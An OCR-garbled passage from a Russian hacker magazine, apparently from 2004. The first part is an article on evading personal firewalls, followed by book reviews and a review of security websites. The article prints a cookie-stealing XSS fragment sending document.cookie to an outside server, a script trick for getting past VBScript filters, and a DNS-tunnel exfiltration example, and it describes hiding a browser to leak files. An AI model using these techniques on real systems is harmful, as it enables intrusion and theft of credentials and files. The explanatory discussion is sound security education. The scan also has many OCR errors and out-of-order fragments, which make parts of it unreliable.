открытых портов, указывая иденти- 
фикатор процесса (PID), который это 
соединение использует. Чтобы y3- 
нать, какому процессу принадлежит 
этот PID, можно воспользоваться дис- 
петчером задач или просто запустить 
tasklist. Программа tasklist, запущен- 
ная с ключом “SVC, позволяет узнать, 
какие сетевые службы (сервисы) обс- 
луживаются тем или иным процессом. 

Поскольку фильтрация трафика яв- 
ляется старым и наиболее прорабо- 
танным методом защиты, обойти ее «в 
лоб» довольно трудно. Если межсете- 
вой экран запрещает входящие сое- 


динения, то установить соединение с 
сервисом на машине невозможно (ес- 
ли только в Bugtraq не промелькнуло 
что-то интересное). Поэтому чаще 
всего проникают на компьютеры с ус- 
тановленным межсетевым экраном 
через клиентские приложения. 


ФИЛЬТРАЦИЯ СОДЕРЖИМОГО 
ПРИКЛАДНЫХ ПРОТОКОЛОВ 

м Если напрямую пробить персо- 
нальный межсетевой экран не уда- 
лось, это делают через клиентское 
приложение. Основные векторы атак 
на клиентов - это Web, почта и дырки 
в головах пользователей. Причем 
часто эти векторы используются сов- 
местно. Например, приходит письмо, в 
котором под видом свежего крякера 
интернета лежит троян, отсылающий 
пароли на вражеский web-cepBep. От 
социотехники и других методов чест- 
ного обмана пользователей межсете- 
вые экраны, конечно, не защищают. 

Если внимательно проанализиро- 
вать Bugtraq, то окажется, что наи- 
большее количество ошибок прихо- 
дится именно на клиентские програм- 
мы. Впереди планеты всей здесь, ес- 
тественно, Internet Explorer, но и дру- 
гие программы не отстают. Даже в ми- 
now сердцу любого юниксоида утили- 
те mail в свое время были найдено пе- 
реполнение буфера 
(www.security.nnov.ru/search/news.asp?binid=2872). 
Однако персональные межсетевые эк- 
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раны не дремлют и в этом случае. 
Многие из них реализуют функцию 
фильтрации содержимого (content-fil- 
ter), то есть умеют работать на прик- 
ладном уровне протокола ТСРЛР. 

Давай представим следующую ситу- 
ацию. У тебя стоит почтовый content- 
filter, настроенный на фильтрацию по 
ключевым словам. Bgpyr приходит 
почтовое сообщение, содержащее ар- 
хив ZIP, в котором есть документ 
Word, в который вставлена таблица 
Excel, в одном из столбцов которого 
содержатся нехорошие слова, пред- 
положим, «Mega Secret Data». 
Content-filter соберет из отдельных 
пакетов все почтовое сообщение, 
найдет в нем архив, развернет его, 
просмотрит все объекты в документе 
Word, обнаружит таблицу Excel и не- 
хорошие слова в ней, после чего заб- 
локирует данное сообщение. 

Кроме того, эти фильтры могут отсе- 
кать компоненты ActiveX, скрипты 
JavaScript и VBScript, почтовые вло- 
жения с расширениями exe и src. На- 
ходит хакер на сервере www.pochta- 
mail.org уязвимость типа Cross-Site- 
Scripting и начинает пробамбливать 
клиентов этого сервера почтовыми 
сообщениями, тихонько уводящими 
их пароли. Но вожделенный 
location.href=""myserver.com&'"+docu- 
ment.cookie почему-то He отрабатыва- 
ет Ha их машинах. В этом может быть 
виноват персональный МСЭ, обрезаю- 
щий потенциально небезопасное со- 
держимое - сценарии. 


КАК ПРОБИВАЕТСЯ ЗАЩИТА 

m= Фильтры содержимого далеко не 
всегда могут распознать вредоносный 
контент. Это связанно с тем, что пол- 
ностью представить себе поведение 
клиентской программы практически не- 
возможно. Ни разу не замечал, как 
программа из пары сотен строк, рабо- 
тавшая вчера, сегодня начинает вытво- 
рять непонятно что? Здесь то же самое: 
фаервол думает одно, а браузер или 
почтовая программа - совсем другое. 

Например, межсетевой экран наст- 
роен на запрет VBScript. И пользова- 
тель получает страницу, на которой 
присутствует подобный код: 


<script language=javascript> 
document.write('<script 

language=vbscript>alert "4mok"<\/script') 
</script> 


С точки зрения фаервола, это бе- 
зобидный JavaScript, а, с точки зре- 
ния браузера, это два скрипта. Ког- 
ga Internet Explorer начнет обраба- 
тывать подобную конструкцию, 
JavaScript создаст в теле страницы 
динамический сценарий, написан- 
ный на запрещенном VBScript. По- 
добные проблемы были еще в 2002 
году подробно описаны ЗАРАЗой 
(www.security.nnov.ru/advisories/content.asp), 
и, оказывается, они актуальны GO 
сих пор. 


А вот пример обхода фильтрации с 
использованием UNICODE - www.securi- 
ty.nnov.ru/opossum/test2.html. Работает Ha 
многих персональных межсетевых эк- 
ранах, в том числе и на Outpost. Пре- 
образовать свой html в UNICODE про- 
ще простого - запусти Notepad, нажми 
"Сохранить как" и в диалоговом окне 
выбери кодировку. 

Практически все персональные 
межсетевые экраны реализуют про- 
верку приложений, пытающихся рабо- 
тать с сетью. Они умеют отслеживать 
сетевую активность приложений, про- 
пуская разрешенное приложение, 
например Internet Explorer, и блоки- 
руя все остальные. Сетевые ффаерво- 
лы также умеют разграничивать дос- 
туп к ресурсам на уровне приложе- 
ний. К примеру, Microsoft ISA Server 
при использовании Firewall Client поз- 
воляет указывать, каким из приложе- 
ний можно пользоваться для выхода 
во внешнюю сеть. 

Казалось бы, контроль сетевых при- 
ложений - весьма вредная вещь для 
большинства троянских программ. 
Однако это не так. Существует огром- 
ное количество методов, позволяю- 
щих обойти эту фильтрацию. Основ- 
ные из них: 

и использование собственных сете- 
вых драйверов 

ш внедрение кода в память доверен- 
ных процессов (Code Injection) 

ш использование служебных прото- 
колов 

и использование доверенных при- 
ложений для утечки данных 

Первые два метода требуют, чтобы 
троянская программа была запущена 
с правами администратора. 


ИСПОЛЬЗОВАНИЕ СОБСТВЕН- 
НЫХ СЕТЕВЫХ ДРАЙВЕРОВ 

и Устанавливается свой собствен- 
ный сетевой драйвер, работающий 
напрямую с NDIS. Если МСЭ фильтру- 
ет трасфик на уровне Winsock, он прос- 
то «не видит» проходящего трасрика. 
Сейчас трюк не актуален, поскольку 
он избитый и большинство сраерво- 
лов его ловит. 


ВНЕДРЕНИЕ КОДА В ПАМЯТЬ 
ДОВЕРЕННЫХ ПРОЦЕССОВ 
(CODE INJECTION) 

и Внедрение кода использует gpy- 
гой подход. В памяти ищется заведо- 
мо разрешенная программа, в ее ag- 
ресное пространство внедряется код, 
через который осуществляется взаи- 
модействие с клиентской частью тро- 
янской программы. Межсетевой экран 
разрешил взаимодействие программы 
с внешней сетью, поэтому он пропус- 
кает и запросы троянца. 

Есть несколько методов внедрения 
в адресное пространство других про- 
цессов (подробнее об этом читай в 
статьей "Игра в прятки"). Один из них 
- подмена API и DLL Injection. Этот ме- 
TOg широко используется rootkits для 
Windows. Недавно на сайте www.xakep.ru 


была опубликована статья о реализа- 
ции этого метода на Delphi (www.xakep.ru/ 
post/23288/default.asp). А по адресу 
www.forum.sources.ru/index.php?show- 
topic=48014 смотри перевод статьи Holy 
Father, создателя известного инстру- 
мента Hacker Defender. Внедрение в 
процессы подробно и с примерами 
описано в статье rattle, опубликован- 
ной в свежем Phrack (www.phrack.org/ 
show.php?p=62&a=13). Там же есть исход- 
ник приложения, внедряющегося в 
запущенный IE и уже в его контексте 
работающий с сетью. 

Однако, как говорилось, подобные 
методы требуют, чтобы троян был за- 
пущен с правами администратора, что 
не всегда возможно. Два последних 
метода (использование служебных 
протоколов и использование дове- 
ренных приложений для утечки дан- 
ных) лишены этого недостатка. 


ИСПОЛЬЗОВАНИЕ СЛУЖЕБНЫХ 
ПРОТОКОЛОВ И ДОВЕРЕННЫХ 
ПРИЛОЖЕНИЙ ДЛЯ УТЕЧКИ 
ДАННЫХ 

и Использование служебных прото- 
колов позволяет «выводить» данные 
с атакуемого компьютера через те се- 
тевые службы, которые обычно не 
фильтруются межсетевыми экранами. 
Например, троянская программа за- 
пускает команду ping deww2362hewuiw. 
megahackersuper.wherehere.ru. 
Windows посылает DNS запрос Ha раз- 
решение имени в IP-agpec. Межсете- 
вой экран пропускает этот запрос. На 
приемной стороне стоит «специализи- 
рованный» сервер DNS, отвечающий 
за зону Megahackersuper. 
wherehere.ru, который извлекает из 
имени (deww2362hewuiw) полезные 
данные и возвращает в ответе коман- 
ды трояну. В результате имеем канал 
утечки. Еще один интересный способ 
- запустить Internet Explorer и попро- 
сить его передать данные во внешний 
мир. Но здесь возникает одна пробле- 
ма - IE надо запускать в скрытом ре- 
жиме, чтобы пользователя не удивля- 
ли непонятные окна на рабочем сто- 
ле, занимающиеся своими делами. 


Персональ- 
ные межсе- 
тевые экра- 
ны (МСЭ) 
очень попу- 
лярны, так 
как могут 
защитить 
от проник- 
новения 
вредоносно- 
го кода и 
утечки цен- 
ной инфор- 
мации. 


Основа за- 

щиты любо- 
го межсете- 
вого экрана 
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Более эф- 
фективная 
фильтрация 
- на прик- 
ладном 
уровне про- 
токола 
ТСРЛР 
(фильтра- 
ция содер- 
жимого). 


Чтобы 
нейтрализо- 
вать попыт- 
ки исполь- 
зования go- 
веренных 
приложений 
троянами, 
МСЭ перех- 
ватывают 
запуск при- 
ложений с 
типом отоб- 
ражения 
SW_HIDE. 


SW_HIDE. Если все делать оператив- 
но, пользователь ничего не заметит. 
А как же Internet Explorer будет копиро- 
вать с жесткого диска ценную инфформа- 
цию? Для этого можно воспользоваться 
сценариями. Посмотри на пример: 
Эта небольшая программа считывает 
с жесткого диска содержимое сфайла 
boot.ini и передает его на <badserver>, 
используя тот же экземпляр браузера, 
в котором выполняется. Пример тако- 
го трояна можно найти в статье на 
.Подправь 
boot.ini на нужный срайл и вперед. МЕ 
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Идеальный комп для: 
Хакера 
Программиста 
Геймера 
Дизайнера 
Мнения пользователей, 
лучшие конфигурации, софт. 


Идеальный мобильный ПК, 
КПК, сервер и еще 
куча способов 
порадовать себя 
приятным подардком! 
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WINDOWS ХР HOME 
EDITION: 
НЕДОКУМЕНТИРОВАННЫЕ 
возможности 


СПб.: БХВ-Петербург 


2004 

Mor Д. 

768 страниц 

Разумная цена: 265 рублей 


Для тех, кто исполь- 

зует ХР и не доволен 
стандартным мануалом. 
Настройка рабочей среды, 
панелей управления и ме- 
ню, инструментарий для 
устранения неполадок, 
совместимость различных 
версий программного обес- 
печения, специальные воз- 
можности работы клавиа- 
туры и мыши, секреты об- 
щего доступа к дискам, 
папкам и принтерам, почта, 
чаты и видеоконференции. 
Уровень книги - для начи- 
нающих. 
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ОБНАРУЖЕНИЕ 
ВТОРЖЕНИЙ В СЕТЬ. 
НАСТОЛЬНАЯ КНИГА 
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СИСТЕМНОМУ АНАЛИЗУ 


М.: Издательство "Лори" 


2001 

Стивен Норткатт 

384 страницы 

Разумная цена: 230 рублей 


Иногда кажется, что 

сети созданы для то- 
го, чтобы их ломали и про- 
никали в них, воруя или 
уничтожая информацию. 
Эта книга поможет тебе 
выявлять слабые места в 
системе, повышать безо- 
пасность, распознавать на- 
падения, использовать 
фильтры, ловушки и 
брандмауэры, различать 
нормальный и аномальный 
трафик, отличать признаки 
реального нападения от 
ложной тревоги и приме- 
нять методы автоматиза- 
ции мониторинга сети. Про- 
читаешь и станешь непло- 
хим аналитиком по безо- 
пасности :). 
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СПб.: БХВ-Петербург 

2004 

Попов А.В. 

752 страницы 

Разумная цена: 320 рублей 


Книга посвящена WMI 

- технологии управле- 
ния и слежения за работой 
корпоративной сети. Ис- 
пользуя WMI и специаль- 
ные сценарии WSH 
(Windows Script Host), мож- 
но управлять различными 
версиями ОС Windows (об- 
ращение к системным счет- 
чикам, анализ журнала со- 
бытий, работа с файловой 
системой, управление запу- 
щенными процессами и сер- 
висами), ресурсами и служ- 
бами сети (настройка сете- 
вых служб DNS, DHCP ит.п., 
управление сетевыми уст- 
ройствами, поддерживаю- 
щими технологию SNMP), 
серверными приложениями 
(Application Center, 
Operations Manager, 
Systems Management 
Server, 1$, Exchange Server 
и SQL server) и вести мони- 
торинг системы в реальном 
времени. На прилагающем- 


ся CD куча готовых сцена- 
риев WMI на VBScript и па- 
кетных файлов WMIC. 


СИСТЕМНОЕ 


ПРОГРАММИРОВАНИЕ 
В СРЕДЕ WIN32 


2001 


464 страницы 


Использование ин- 

терфейса программи- 
рования приложений Win32 
API и зарождающегося 
Win64 API. Файловая систе- 
ма Win32, символьный 
ввод/вывод, реестр, струк- 
турная обработка исключе- 
ний, службы безопасности, 
управление памятью и DLL, 
управление потоками и про- 
цессами, синхронизация, 
межпроцессорное взаимо- 
действие (с использовани- 
ем каналов и почтовых 
ячеек), сетевое программи- 
рование (с использованием 
сокетов), разработка 
служб МТ, удаленный вы- 
зов процедур, архитектура 
и модели Win64, перенос 
существующего кода и 
многое другое. 


WINDOWS ХР: ПОЛНЫЙ 
СПРАВОЧНИК В 
ВОПРОСАХ И ОТВЕТАХ 


Более 1400 вопросов 

и ответов на них. Пол- 
ным, конечно, этот справоч- 
ник назвать нельзя, но наи- 
более часто встречающие- 
ся вопросы здесь удачно 
собраны и структурированы 
по темам. Любая настройка 
проста, но различных наст- 
роек тысячи и запомнить та- 
кое количество просто не- 
реально. Поэтому данное 
пособие очень удобно ис- 
пользовать по мере возник- 
новения проблемы. Темы: 


2004 


496 страниц 


основные понятия ХР, рабо- 
та с приложениями и доку- 
ментами, работа с дисками, 
работа с папками и файла- 
ми, настройка рабочей сре- 
ды, стандартные программы 
общего назначения, уста- 
новка и настройка оборудо- 
вания, мультимедийные 
средства ХР, автоматизация 
работ и обслуживание сис- 
темы, работа в сети ит.п. 


БЕЗОПАСНОСТЬ 


СЕРВЕРОВ WINDOWS 
NT/2000 В ИНТЕРНЕТЕ 
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Серверов на базе 

Windows МТ/2000 
достаточно много, и вопрос 
их безопасности - один из 
первых. Конфигурация по 
умолчанию, создаваемая 
при инсталляции, делает 
сервер мишенью для атак. 
Эта книга содержит 


инструкции для админист- 
раторов по установке и 
грамотному администриро- 
ванию сервера. Описаны 
типичные бреши в безо- 
пасности Windows 
NT/2000, способы укреп- 
ления (настройка служб, 
редактирование реестра, 
установка прав, конфигу- 
рация IPSec ит.д.), безо- 
пасное удаленное админи- 
стрирование (pcAnywhere, 
службы терминала 
Windows 2000, OpenSSH, 
TCP Wrappers, VNC u 
Cygwin), резервное копиро- 
вание, восстановление и 
мониторинг. 


АЗБУКА 
ПРОГРАММИРОВАНИЯ 
В WIN32 API 
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Книжка сугубо gna 

программистов. Рас- 
сматриваются вопросы 
создания приложений для 
Windows 95/NT. Что прият- 
но, так это завершенные и 
реально работающие при- 
меры, которые приведены 
в тексте. В них наглядно 
показано, как можно ис- 
пользовать возможности 
Win32 API. При этом npeg- 
полагается, что ты уже 
знаком с языком С/С++. 
Содержание построено так: 
сначала вводная база и 
возможности целиком и 
только потом обучение на- 
выкам создания пользова- 
тельского интерфейса. Тем 
самым автор указывает, 
что для написания первой 
программы нужны доста- 
точно глубокие знания. 


MICROSOFT WINDOWS ХР 
PROFESSIONAL. 

ОПЫТ СДАЧИ 
СЕРТИФИКАЦИОННОГО 
ЭКЗАМЕНА 70-270 
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Книга поможет Nogro- 

товиться к сертифи- 
цированному экзамену 70- 
270: Installing, Configuring 
and Administering Microsoft 
Windows XP Professional. B 
отличие от пособия MS, это 
не сухое изложение «воп- 
рос-ответ», а подробный 
разбор всех вариантов от- 
ветов. Содержание соотве- 
тствует требованиям кан- 
дидатов на сдачу экзамена, 
так что после прочтения 
можешь сдаваться :). Бо- 
нус - задания тренировоч- 
ного экзамена, ответы и 
комментарии к экзаменаци- 
онным вопросам, по кото- 
рым ты сможешь оценить 
степень своей подготов- 
ленности. 


ГОЛОВНАЯ БОЛЬ 
WINDOWS ХР 


Название книги как 

нельзя лучше харак- 
теризует ХР ;), так как при 
работе с ней периодически 
возникают проблемы. Для 
удобства все проблемы раз- 
биты по темам - проще най- 
ти решение по оглавлению. 
Среди описанных проблем: 
неполадки при настройке 
интерфейса, неполадки в 
управлении папками и фай- 
лами, неполадки в органи- 
зации работы нескольких 
пользователей, неполадки в 
работе стандартных и прик- у 


ATAKA HA WINDOWS 


ладных программ, Henonag- 
ки в работе аппаратного 
обеспечения, неполадки в 
работе дисковых накопите- 
лей, неполадки в работе пе- 
риферийных устройств, не- 
поладки в работе принтера, 
сканера и цифровой каме- 
ры, проблемы соединения с 
инетом, неполадки в работе 
Internet Explorer, неполадки 
в работе Outlook Express, 
неполадки в работе локаль- 
ной сети, неполадки с быст- 
родействием, неполадки ус- 


тановки и загрузки системы. 


В качестве бонуса - 20 наи- 
более часто встречающих- 
ся неполадок ХР. 


WINDOWS ХР/2000. 
ВОПРОСЫ И ОТВЕТЫ 
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Книга из разряда 
Must Have! Большой 
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ОБЗОР КНИГ 


справочник, построенный 
по принципу "вопрос-от- 
вет". Более 1000 вопросов, 
в основном касающихся 
повседневного администри- 
рования Windows ХР/2000. 
Каждый вопрос включает в 
себя обзор используемой 
технологии, понятные объ- 
яснения, пошаговые 
инструкции и примеры эф- 
фективного решения опи- 
сываемой проблемы. Как 
установить на одном компь- 
ютере Windows МТ и Linux? 
Как установить Windows МТ 
по сети? Как изменить по- 
рядок запуска служб? Как 
резервировать системный 
реестр? Где хранится спи- 
сок кэшированных доме- 
нов? Что такое маршрути- 
зация и как ее настроить? 
Как включить аудит основ- 
ных объектов? Как обма- 
нуть программу, чтобы она 
запускалась как будто в 
МТ/98/95? Как сохранить 
информацию, которая отоб- 
ражается на синем экране? 
Ответы в книжке. 


WINDOWS 2000: 
КОМАНДЫ. КАРМАННЫЙ 
СПРАВОЧНИК 
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Если ты постоянно 

пользуешься коман- 
дами для командной строки 
в Windows 2000 и Windows 
NT Resource Kit, этот спра- 
вочник не раз тебе приго- 
дится. Он содержит практи- 
чески все команцы, с приме- 
рами и комментариями: ко- 
манды справки, общие ко- 
манды, административные 


команды, работа с файлами, 
работа с каталогами, работа 
с дисками и файловыми 
системами, совместное ис- 
пользование, печать, сете- 
вые команды, администри- 
рование пользователей и 
групп, управление процес- 
сами, управление служба- 
ми, доступ к системному ре- 
естру, Active Directory и ко- 
манды управления доменом 
ит.9. Помимо команд кратко 
описан язык подготовки 
сценариев (scripting lan- 
guage) и приведены полез- 
ные ссылки на ресурсы в 
инете. 


ВНУТРЕННЕЕ 
УСТРОЙСТВО MICROSOFT 
WINDOWS 2000. 
МАСТЕР-КЛАСС 
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Если тебе интересно 

заглянуть внутрь 
Windows 2000 и понять ал- 
горитмы работы ее компо- 
нентов, то непременно чи- 
тай эту книгу. Ты поймешь, 
как функционирует систе- 
ма, и сможешь проектиро- 
вать эффективные прило- 
жения для платформы 
Windows 2000. Вот только 
основные темы: архитекту- 
ра системы и ключевых 
компонентов, принципы 
взаимодействия, подсисте- 
мы окружения (Win32, 
POSIX, OS/2), диспетчери- 
зация ловушек и прерыва- 
ний, синхронизация, систем- 
ные рабочие потоки, про- 
цессы и задания, управле- 
ние памятью (диспетчеры 
памяти и кэша, AWE и PAE), 
файловые системы (FAT16, 
FAT32, NTFS), поддержка 
сетей и многое другое. Ha 
диске к книге: утилиты и 
технические статьи с 


www.sysinternals.com, 
электронная версия самой 
книги на английском и от- 
ладчик ядра LiveKd, позво- 
ляющий вести отладку сис- 
темы, в отличие от станда- 
ртного отладчика ядра, без 
второго компьютера. 


ПРОГРАММИРОВАНИЕ В 
СЕТЯХ MICROSOFT 
WINDOWS. МАСТЕР- 
КЛАСС 
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Для тех, кто интересу- 

ется сетевыми функ- 
циями Windows и занимает- 
ся разработкой сетевых 
приложений на платформе 
Win32 с использованием 
интерфейсов программиро- 
вания NetBIOS (типичные 
процедуры и справочник 
команда) и Winsock (включая 
поддерживаемые протоко- 
лы, семейства адресов, раз- 
решение имен, методики 
ввода-вывода, параметры 
сокетов и справочник ко- 
мана). Дополнительные воз- 
можности Windows - QoS и 
IP Helper. Наглядное прог- 
раммирование клиента РАЗ 
включая работу с телефон- 
ным справочником, функци- 
ями безопасности, разре- 
шениями пользователей и 
т.д. К книге прилагается 
диск, на котором ты най- 
дешь код примеров на С++ 
и Visual Basic, полезные 
программы и обновления. 


БЕЗОПАСНОСТЬ СЕТИ НА 
ОСНОВЕ WINDOWS 2000. 
УЧЕБНЫЙ КУРС MCSE 


Сдавать сертифика- 

ционный экзамен (70- 
220 по программе серти- 
фикации специалистов 


MCSE no Windows 2000), k 
которому готовит книжка, 
совершенно необязатель- 
но. Зато, прочитав книгу, 
ты сможешь проектиро- 
вать защищенные сети на 
основе Windows 2000. 
Аутентификация, защита 
файловых ресурсов, воз- 
можности шифрования 
файловой системы, проек- 
тирование групповой поли- 
тики, защита типичных 
служб (DNS, DHCP, RIS, 
SNMP и служб термина- 
лов), сертификация, защи- 
та протоколами прикладно- 
го уровня и IPSec, безопас- 
ное подключение удален- 
ных пользователей и мно- 
гое другое. 


ЭФФЕКТИВНАЯ РАБОТА: 
БЕЗОПАСНОСТЬ 
WINDOWS 


Каждый день появля- 

ются новые страшные 
вирусы, а число багов в 
Windows ХР/2000 растет 
как на дрожжах. Безопас- 
ность при работе в сети - 
проблема номер один. Из 
книги ты узнаешь, как выс- 
тоять в инете против виру- 
сов, червей и спама, как 
грамотно настроить доступ 
к сетевым ресурсам (аутен- 
тификация, сертификаты, 
групповая политика) и мо- 
ниторить систему. Отдельно 


рассмотрены нюансы ис- 
пользования брандмауэров 
и других приложений, бло- 
кирующих доступ в систе- 
му, беспроводные сети, уда- 
ленный доступ и сети VPN. 
Кодирование файлов и па- 
пок, групповая политика и 
шаблоны безопасности, 
блокировка портов и ана- 
лиз событий в системе бе- 
зопасности. 


WINDOWS ХР. ТРЮКИ 
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100 практических 
приемов настройки 
ХР под себя, если стандарт- 


ных возможностей тебе уже 
мало. Настройка многовари- 
антной загрузки, отключе- 
ние ненужных программ и 
служб, настройка интер- 
фейса с помощью TweakUI, 
работа с WindowBlinds, 
PowerDesk, утилита Better 
File Rename, сжатие gaH- 
ных, сооКе, анонимность в 
интернете, настройка WiFi и 
DNS, использование бесп- 
латного брандмауэра 
ZoneAlarm и прокси-серве- 
ра, настройка шлюза и ис- 
пользование VPN, блоки- 
ровка портов, удаленное 
управление компом, борьба 
со спамом, редактирование 
реестра, работа со звуком и 
видео, повышение произво- 
дительности, резервное ко- 
пирование, восстановление 
системы и много чего еще. 


ADMIN 911. ГРУППОВЫЕ 
ПОЛИТИКИ WINDOWS 
2000 
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Если ты администри- 

руешь или собира- 
ешься администрировать 
сеть на Windows 2000, то 
обязательно столкнешься с 
проблемой использования 
групповых политик. В книге 
подробно описана архитек- 
тура групповых политик и 
практические способы опти- 
мизации с использованием 


Ш Книги нам предоставил букинистический интернет-магазин "ОЗ$-Книга". 
Если тебя заинтересовала какая-нибудь из книг, ты можешь без проблем 


приобрести ее по указанным ценам на сайте www.osbook.ru. Книг, кстати, там 
значительно больше, чем в обзоре :). 


Active Directory. Отдельно 
рассмотрены возможности 
IntelliMirror: дисковые кво- 
ты, переадресация папок и 
роуминг профайлов пользо- 
вателей. Описаны возмож- 
ные неполадки, конфликты 
сайтовых и доменных стра- 
тегий и способы их устране- 
ния. Использование PolEdit, 
Config.pol, Ntconfig.pol и 
ADMT (Active Directory 
Migration Tool). 


MICROSOFT WINDOWS 
2000. TCP/IP. 
ПРОТОКОЛЫ И СЛУЖБЫ 
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Достаточно подроб- 
[>> ный справочник по 

ТСРЛР-протоколам и 
службам для сетей Windows 
2000: уровень сетевого ин- 
терфейса (технологии ло- 
кальной сетевой связи - 
Е АМ-технологии, техноло- 
гии глобальной сетевой 
связи - МГАМ-технологии, 
протокол разрешения адре- 
сов - АКР), протоколы меж- 
сетевого уровня (основы, 
адресация, маршрутизация, 
протокол управляющих со- 
общений - ICMP, протокол 
управления группами - 
IGMP, IPv6), протоколы 
транспортного уровня (про- 
токол передачи пользова- 
тельских дейтаграмм - UDP, 
основы ТСР, ТСР-соедине- 
ния, информационный по- 
ток TCP ит.9д.), протоколы и 
службы прикладного уров- 
ня (DHCP, DNS, WINS, IIS, 
IPSec и VPN). Много практи- 
ческих примеров и диск с 


трассировками. 
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WEB-OB30P 


Каролик Андрей (andrusha@real.xakep.ru) 


МЕВ-ОБЗО 


О БЕЗОПАСНОСТИ WINDOWS И НЕ ТОЛЬКО 


WWW.MICROSOFT.COM/ 
WINDOWS 


и хакеры, и юзеры, и 
ламеры - те, кто использует, 
атакует Винду или просто 
интересуется. Если ты не 
просматриваешь этот сайт, 
то многое теряешь. Именно 
здесь раньше всего появля- 
ются обновления, патчи, сер- 
виспаки и полезные бесплат- 
ные приложения. Конечно, 
потом это хозяйство растас- 
кивают по другим ресурсам и 
выкладывают на пиратские 
диски. Для каждой ОС свой 
подраздел, по ХР - 
www.microsoft.com/windowsxp. 
Первым делом смотри в 
Download 
(www.microsoft.com/windowsxp/dow 
loads), откуда тяни послед- 
ние патчи и апдейты. На сай- 
те есть довольно приличная 
документация по ХР 
(www.microsoft.com/rus/win- 
cowsxp): обзор системы, опи- 
сание основных фишек, раз- 
личия версий, состав сер- 
виспаков и советы по повы- 
шению безопасности систе- 
мы. Последние бюллетени 
по уязвимостям смотри на 
www.microsoft.com/Rus/Security/Bull 
elin. Здесь же описаны мини- 
мальные действия, которые 
нужно проделать, чтобы 
обеспечить свою безопас- 
ность (www.microsoft.com/Rus/ 
Security/Protect): установка и 


у» Сайт, который смотрят 
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использование встроенного 
межсетевого экрана, наст- 
ройка автоматического об- 
новления (но в России тра- 
фик, к сожалению, gO сих 
пор не безлимитный), а так- 
же даны советы по примене- 
нию антивирусных программ. 


WWW.BUGTRAQ.RU 


| 


= 


Этот сайт регулярно 
[>> попадает в web-0630- 
ры, и он того стоит. Один из 
крупнейших порталов по бе- 
зопасности на русском язы- 
ке. Специалисты no IT ценят 
ресурс за его позициониро- 
вание - в новостную ленту и 
обзоры попадает информа- 
ция только об известных 
программах, информацион- 
ный поток не засоряется ма- 
лоизвестными и никому не- 
нужными программами. Ре- 
гулярность новостных вы- 
пусков - несколько раз в не- 
делю, иногда несколько раз 
в день. Большая часть но- 
востных материалов и обзо- 
ров - переводы с первоис- 
точников: WWW пегеоег.со.ик, 
Www.news.com, www.pcwelt.de, 
www.atstake.com, www.computer- 
world.com, news.netcraft.com, 
Www.pcmag.com и т.п. Есть нес- 
колько авторских статей по 
безопасности - 
www.bugtraq.ru/library/security. 
Интересный раздел - 
www.bugtrag.ru/law, содержа- 
щий массу информации по 
вопросам, с которыми стал- 
киваются владельцы интел- 
лектуальной собственности. 
Энтузиасты имеют возмож- 


ность влиться в проект (ко- 
торый www.bugtraq.ru сде- 
лали совместно с \\\/\W.Wer 
wolf.de) - www.bugtraq.ru/dnet. 
Изначально проект созда- 
вался gna того, чтобы ле- 
гально взломать криптогра- 
фический шифр RC5-64 
компании RSA, а теперь де- 
ло дошло go RC5-72. Доста- 
точно сказать, что команда 
занимает второе место в ми- 
ре по численности и третье 
по производительности 
(www.bugtraq.ru/dnet/stat). 


WWW.SECURITY.NNOV.RU 


Онлайновый монито- 

ринг безопасности. 
Собираются данные со всех 
доступных ресурсов (рус- 
скоязычных и англоязыч- 
ных), им присваивается сте- 
пень опасности по пятибал- 
льной шкале, даются крат- 
кое описание и ссылка на 
первоисточник. Подобный 
подход имеет явный минус - 
информационный вал не 
так интересен узким специ- 
алистам. С другой стороны, 
для тех, кто хочет получить 
общее представление о ми- 
ре компьютерной безопас- 
ности и держать руку на 
пульсе, это самое оно. 
Здесь ты найдешь инфор- 
мацию о новых ошибках, 
уязвимостях, эксплоитах, 
крупных атаках и взломах. 
Собственных статей у ре- 
сурса почти нет (ум. 5есиг 
ty.nnov.ru/articles). Интересен 
форум на сайте (млм. 5есип- 
ty.nnov.ru/board) - там можно 
встретить авторитетных 


специалистов и пообщаться 
с ними на равных, спросить 
совета или посоветовать 
что-то другим. 


WWW.OSVDB.ORG 


OSVDB - открытая 6a- 
за данных по 6e30- 
пасности. Все желающие 


могут сливать сюда инфор- 
мацию о найденных багах, 
дырках, уязвимостям. Юзер 
ты, профи или девелоперс- 
кая компания - не имеет 
значения. Ты вводишь ос- 
мысленный заголовок и 
описываешь найденную 
проблему, модератор прове- 
ряет запись, и твой запрос 
получает идентификацион- 
ный номер в базе. Те запро- 
сы, которые описывают 
проблему, но не содержат 
инструкции по ее устране- 
нию, помечаются как "New". 
Если сразу или позже будут 
добавлены указания, как 
устранить проблему, запрос 
получает статус "Stable". Ре- 
сурс породили конференции 
Black Hat and Defcon, он был 
создан для удобства исполь- 
зования в узких кругах. Поз- 
же ресурс значительно рас- 
ширился, а 31 марта 2004 
его сделали открытым. Поль- 
зуйся на здоровье. 


WINCHANGER.WHATIS.RU 


Ресурс с веселым тит- 
лом: "Изменим окна к 
лучшему :)". Это подресурс 
большого портала 
уп мупаиз.ги, который посвя- 
щен околокомпьютерным 


темам: реестр, система, ап- 
паратная часть ПК, програ- 
ммные настройки и т.д. При- 
чем реестру Windows отве- 
ден целый подраздел - 
www.whatis.ru/reg/index.shtml. 
Там есть статьи, дающие 
базовые знания о реестре 
(структура, резервирова- 
ние, изменения, гед-файлы) 
с конкретными примерами, 
как это можно использо- 
вать на практике для наст- 
ройки различных парамет- 
ров операционной системы, 
оптимизации работы, огра- 
ничения доступа, увеличе- 
ния быстродействия и наст- 
ройки внешнего вида GUI. 
Кроме того, на 
winchanger.whatis.ru есть спра- 
вочники, глоссарий техни- 
ческих терминов, полезные 
советы и ссылки. 


WWW.LCP.NM.RU 


Для склеротиков и 

тех, кто хочет полу- 
чить чужие пароли пользо- 
вателей в системе (Windows 
NT/2000/XP), нужна прог- 
рамма LC+4. Для восстанов- 
ления SID и имен учетных 
записей нужна прога 
SID&User. Обе программы 
доступны на этом сайте и 
распространяются, что 
очень приятно, совершенно 
бесплатно. Здесь скриншо- 
ты программ, описание воз- 
можностей, небольшой ма- 
нуал и гостевая книга, в ко- 
торой на вопросы действи- 
тельно отвечают. 


WWW.SECURITYLAB.RU 


Авторитетный инфор- 

мационный портал, 
ежедневно публикующий 
информацию о событиях в 
области информационной 
безопасности. Оператив- 


ность - конек ресурса, об- 
новления делаются нес- 
колько раз в день. Подбор- 
ка ведется по всем просто- 
рам рунета и западным ре- 
сурсам. Помимо описания 
уязвимостей публикуются 
конкретные рекомендации 
по их нейтрализации и уст- 
ранению. Кроме новостей, 
на сайте есть авторские (в 
том числе и переводные) 
